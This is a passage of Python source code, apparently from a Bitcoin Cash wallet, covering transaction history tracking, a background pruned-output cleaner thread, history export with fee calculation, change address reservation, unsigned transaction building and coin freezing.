h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
self._update_request_statuses_touched_by_tx(tx_hash)
def _update_request_statuses_touched_by_tx(self, tx_hash):
tx = self.transactions.get(tx_hash)
if tx is None:
return
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
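# How the running balance above unwinds (hypothetical two-tx history with a
# total balance of 8000): iterating newest-first, each row carries the balance
# *after* its tx, then delta is subtracted to get the previous row's balance:
#   (tx2, delta +3000) -> balance 8000
#   (tx1, delta +5000) -> balance 5000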
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Note that the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactions since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because of the Python lists, dicts, etc. they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr is None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead, if it's less than 1.0 sats/B, we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
elif callable(fixed_fee):
fee_estimator = fixed_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
else:
# Currently the only code that uses this hook is the deprecated
# Cash Shuffle plugin
change_addrs = run_hook("get_change_addrs", self) or []
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes = tx.estimated_size()
fee_in_satoshis = tx.get_fee()
sats_per_byte = fee_in_satoshis / tx_in_bytes
if sats_per_byte > 50:
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
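# Hedged sketch of the "spend max" convention handled above: exactly one
# output may carry the sentinel value '!'; it receives whatever remains of
# the inputs after the fee. TYPE_ADDRESS/coins/dest_addr are assumed names.
# >>> outputs = [(TYPE_ADDRESS, dest_addr, '!')]
# >>> tx = wallet.make_unsigned_transaction(coins, outputs, config)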
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
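# Illustrative calls showing the three accepted `utxo` forms (coin names
# are made-up placeholders):
# >>> wallet.is_frozen_coin('aa..ff:0')                # str  -> bool
# >>> wallet.is_frozen_coin(coin_dict)                 # dict -> bool, refreshes 'is_frozen_coin'
# >>> wallet.is_frozen_coin({'aa..ff:0', 'bb..00:1'})  # set  -> frozen subset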
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets in a single call. Thus after
a call to `set_frozen_coin_state(utxos, False)`, both the temporary and
the persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
# Note: we could do an is_mine check for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
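# Hedged example of ephemeral vs. persistent freezing (coin names made up):
# >>> wallet.set_frozen_coin_state(['aa..ff:0'], True, temporary=True)  # in-memory only
# >>> wallet.set_frozen_coin_state(['bb..00:1'], True)                  # persisted to storage
# >>> wallet.set_frozen_coin_state(['aa..ff:0', 'bb..00:1'], False)     # clears both sets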
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
